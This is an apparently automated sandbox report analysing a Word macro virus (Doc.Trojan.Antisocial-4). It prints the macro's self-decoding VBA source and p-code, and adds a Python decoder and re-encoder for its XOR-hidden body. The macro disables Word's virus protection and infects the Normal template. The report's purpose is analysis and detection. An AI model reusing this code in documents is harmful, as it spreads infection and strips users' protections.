Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious OLE (Word) document containing VBA macros. Its Document_Open handler runs automatically when the document is opened and first sets Application.EnableCancelKey = wdCancelDisabled so the user cannot interrupt it with Ctrl+Break. The macro is self-modifying: for module lines 6 to 18 it reads each line back through ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines, takes a single-digit XOR key from the line's second character, XOR-decodes every character from the third position onward, writes the plaintext back with CodeModule.ReplaceLine, and then calls ViewVBCode, whose body is exactly those thirteen lines, stored as XOR-encoded comment lines. Decoding them with the same routine shows that ViewVBCode switches off Word's macro warning and save prompts (Options.VirusProtection, Options.ConfirmConversions and Options.SaveNormalPrompt set to 0), takes the code modules of ThisDocument, ActiveDocument and NormalTemplate, re-encodes its own lines with a fresh random key (Int(Rnd * 8) + 1), replaces the contents of the ActiveDocument and NormalTemplate modules with the whole macro, and saves the active document. This is a self-replicating Word macro virus that infects the Normal template, consistent with the ClamAV name Doc.Trojan.Antisocial-4. None of the decoded lines references a URL, a shell command or a download API, so there is no evidence in this sample of a second-stage download. Two practical notes: the decode loop depends on programmatic access to the VBA project object model, which Word 2003 and later block by default unless "Trust access to the VBA project object model" is enabled, so the macro fails on a default modern installation; and the p-code disassembly appended to the script preview follows the same statement sequence as the decompressed source, so the source has not been replaced by VBA stomping and can be analysed as shown.
Heuristics (3)

- ClamAV: Doc.Trojan.Antisocial-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Antisocial-4
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): the document contains a Document_Open macro, which Word runs automatically when the document is opened
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4455 bytes | bf917fdd1d56808f3b8a80ccf2ee8ea3ce4eee10b7a47eb7276cf12b7b31a4b7 |

Detection for macros.bas: ClamAV: Doc.Trojan.Antisocial-4. Obfuscation or payload: unlikely (this automated rating is contradicted by the script preview, in which the body of ViewVBCode is stored as XOR-encoded comment lines that Document_Open decodes and writes back at run time).
Preview of script (first 1,000 lines of the extracted script). Line breaks have been restored from the flattened preview; the four statement lines of Document_Open are kept as the single long lines the sample uses, because the decode loop addresses module lines by number: lines 6 to 18 of the module are the thirteen comment lines inside ViewVBCode. The p-code disassembly that olevba appends as comments follows the source.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
For d = 6 To 18: C$ = "": I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) Xor f: C$ = C$ & Chr(B$): Next X: A = C$
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: Call ViewVBCode: End Sub
Private Sub ViewVBCode()
'6Ivroihu(UgpcHitkgjVtikvr&;&6
'5Juqljkv+FjkclwhFjks`wvljkv%8%5?%Juqljkv+SlwpvUwjq`fqljk%8%5
'5V`q%FH%8%QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`
'3Pfw#BG#>#B`wjufGl`vnfmw-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof
'3Pfw#MW#>#MlqnboWfnsobwf-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof
'7Ahu'c':'1'Sh'6?='D#':'%%='N':'/DJ)Knibt/c+'6..
'1g!<!Hou)Soe!+!9(!*!0;!Gns!Y!<!0!Un!Mdo)H(;!C%!<!@rb)Lhe)H-!Y-!0((!Yns!g;!B%!<!B%!'!Bis)C%(;!Odyu!Y;!@!<!B%
'7SontChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)UbwkfdbKnib'c+'% %'!'a'!'F='Ib s'c
'7JD':'DJ)Knibt/6+'DJ)DhrisHaKnibt.
'6GB(BcjcrcJohcu&7*&GB(EishrI`Johcu<&GB(Gbb@tikUrtoha&KE
'1OU/EdmdudMhodr!0-!OU/BntouNgMhodr;!OU/@eeGsnlRushof!LB
'4Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia
'7 Fuebnsbu'E~'K~t'Lhqndl)))'Tr hu'Jn'Dhdlrt
End Sub
' Processing file: /opt/analyzer/scan_staging/eaab36ffcb18491ab38544214e000218.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8231 bytes
' Line #0:
'   FuncDefn (Private Sub Document_Open())
'   BoS 0x0000
'   Ld wdCancelDisabled
'   Ld Application
'   MemSt EnableCancelKey
' Line #1:
'   StartForVariable
'   Ld d
'   EndForVariable
'   LitDI2 0x0006
'   LitDI2 0x0012
'   For
'   BoS 0x0000
'   LitStr 0x0000 ""
'   St C$
'   BoS 0x0000
'   Ld d
'   LitDI2 0x0001
'   LitDI2 0x0001
'   Ld ThisDocument
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   ArgsMemLd Lines 0x0002
'   Paren
'   St I
' Line #2:
'   Ld I
'   LitDI2 0x0002
'   LitDI2 0x0001
'   ArgsLd Mid$ 0x0003
'   Paren
'   St False
'   BoS 0x0000
'   StartForVariable
'   Ld X
'   EndForVariable
'   LitDI2 0x0003
'   Ld I
'   FnLen
'   For
'   BoS 0x0000
'   Ld I
'   Ld X
'   LitDI2 0x0001
'   ArgsLd Mid$ 0x0003
'   ArgsLd Asc 0x0001
'   Ld False
'   Xor
'   St B$
'   BoS 0x0000
'   Ld C$
'   Ld B$
'   ArgsLd Chr 0x0001
'   Concat
'   St C$
'   BoS 0x0000
'   StartForVariable
'   Ld X
'   EndForVariable
'   NextVar
'   BoS 0x0000
'   Ld C$
'   St A
' Line #3:
'   Ld d
'   Ld A
'   LitDI2 0x0001
'   Ld ThisDocument
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   ArgsMemCall ReplaceLine 0x0002
'   BoS 0x0000
'   StartForVariable
'   Ld d
'   EndForVariable
'   NextVar
'   BoS 0x0000
'   ArgsCall (Call) ViewVBCode 0x0000
'   BoS 0x0000
'   EndSub
' Line #4:
'   FuncDefn (Private Sub ViewVBCode())
' Line #5:
'   QuoteRem 0x0000 0x001D "6Ivroihu(UgpcHitkgjVtikvr&;&6"
' Line #6:
'   QuoteRem 0x0000 0x003C "5Juqljkv+FjkclwhFjks`wvljkv%8%5?%Juqljkv+SlwpvUwjq`fqljk%8%5"
' Line #7:
'   QuoteRem 0x0000 0x0040 "5V`q%FH%8%QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`"
' Line #8:
'   QuoteRem 0x0000 0x0042 "3Pfw#BG#>#B`wjufGl`vnfmw-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof"
' Line #9:
'   QuoteRem 0x0000 0x0042 "3Pfw#MW#>#MlqnboWfnsobwf-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof"
' Line #10:
'   QuoteRem 0x0000 0x002F "7Ahu'c':'1'Sh'6?='D#':'%%='N':'/DJ)Knibt/c+'6.."
' Line #11:
'   QuoteRem 0x0000 0x006B "1g!<!Hou)Soe!+!9(!*!0;!Gns!Y!<!0!Un!Mdo)H(;!C%!<!@rb)Lhe)H-!Y-!0((!Yns!g;!B%!<!B%!'!Bis)C%(;!Odyu!Y;!@!<!B%"
' Line #12:
'   QuoteRem 0x0000 0x005A "7SontChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)UbwkfdbKnib'c+'% %'!'a'!'F='Ib s'c"
' Line #13:
'   QuoteRem 0x0000 0x0022 "7JD':'DJ)Knibt/6+'DJ)DhrisHaKnibt."
' Line #14:
'   QuoteRem 0x0000 0x0037 ... (truncated)
```
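The decode loop of Document_Open, re-implemented in Python as an added example; this is not code from the sample or from the analyzer. It applies the macro's own transformation (key = the digit in the line's second character, XOR over every character from the third position on) to the encoded comment lines copied from the preview above, and also provides the inverse that the decoded replication routine uses to re-key the lines before writing them into another module. Two of the thirteen lines, the eighth and the last, are left out: each contained a 0x7F byte ('x' XOR 7) that the rendered preview shows as a space, so they no longer decode exactly. The function names and the references_replication() triage check are my own and not part of the sample.

```python
"""Reproduce the XOR line decoding of the Document_Open macro (added example)."""

# Encoded comment lines copied from the script preview (module lines 6-18 of the
# sample, minus the two lines whose 0x7F byte was lost in rendering).
ENCODED_LINES = [
    "'6Ivroihu(UgpcHitkgjVtikvr&;&6",
    "'5Juqljkv+FjkclwhFjks`wvljkv%8%5?%Juqljkv+SlwpvUwjq`fqljk%8%5",
    "'5V`q%FH%8%QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`",
    "'3Pfw#BG#>#B`wjufGl`vnfmw-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof",
    "'3Pfw#MW#>#MlqnboWfnsobwf-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof",
    "'7Ahu'c':'1'Sh'6?='D#':'%%='N':'/DJ)Knibt/c+'6..",
    "'1g!<!Hou)Soe!+!9(!*!0;!Gns!Y!<!0!Un!Mdo)H(;!C%!<!@rb)Lhe)H-!Y-!0((!Yns!g;!B%!<!B%!'!Bis)C%(;!Odyu!Y;!@!<!B%",
    "'7JD':'DJ)Knibt/6+'DJ)DhrisHaKnibt.",
    "'6GB(BcjcrcJohcu&7*&GB(EishrI`Johcu<&GB(Gbb@tikUrtoha&KE",
    "'1OU/EdmdudMhodr!0-!OU/BntouNgMhodr;!OU/@eeGsnlRushof!LB",
    "'4Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia",
]


def decode_line(line: str) -> str:
    """Mirror of the macro's inner loop.

    The macro takes the key from Mid(I, 2, 1); VBA coerces that one-character
    string ("6") to the number 6 when it becomes an operand of Xor. Every
    character from position 3 onward (Mid(I, X, 1) for X = 3 To Len(I)) is
    XORed with that key and concatenated back into a string.
    """
    if len(line) < 2 or line[0] != "'" or not line[1].isdigit():
        raise ValueError("not an encoded comment line: %r" % line)
    key = int(line[1])
    return "".join(chr(ord(ch) ^ key) for ch in line[2:])


def encode_line(plain: str, key: int) -> str:
    """Inverse transform, as the decoded replication routine applies it:
    the plaintext line is XORed with a fresh key f = Int(Rnd * 8) + 1 and
    written back as "'" & f & A. XOR with one byte is an involution, so the
    same operation serves for both directions."""
    if not 1 <= key <= 8:
        raise ValueError("the macro draws keys from Int(Rnd * 8) + 1")
    return "'%d%s" % (key, "".join(chr(ord(ch) ^ key) for ch in plain))


def decode_module(lines) -> list:
    """Decode every encoded comment line, in module order."""
    return [decode_line(line) for line in lines]


def references_replication(decoded) -> bool:
    """Triage check (my own, hypothetical name): does the recovered body write
    code into the Normal template, i.e. macro-virus behaviour, rather than
    fetch something from the network?"""
    text = "\n".join(decoded)
    return "NormalTemplate" in text and "AddFromString" in text


if __name__ == "__main__":
    for src in decode_module(ENCODED_LINES):
        print(src)
```

Running the module prints the recovered ViewVBCode body. Re-encoding the same lines with encode_line and another key reproduces what the virus writes into the infected module on each replication, which is why a signature on the raw comment lines is fragile across infections; a more durable detection keys on the decode loop itself in Document_Open (the VBProject.VBComponents.Item(1).CodeModule.Lines / ReplaceLine chain), which is copied verbatim.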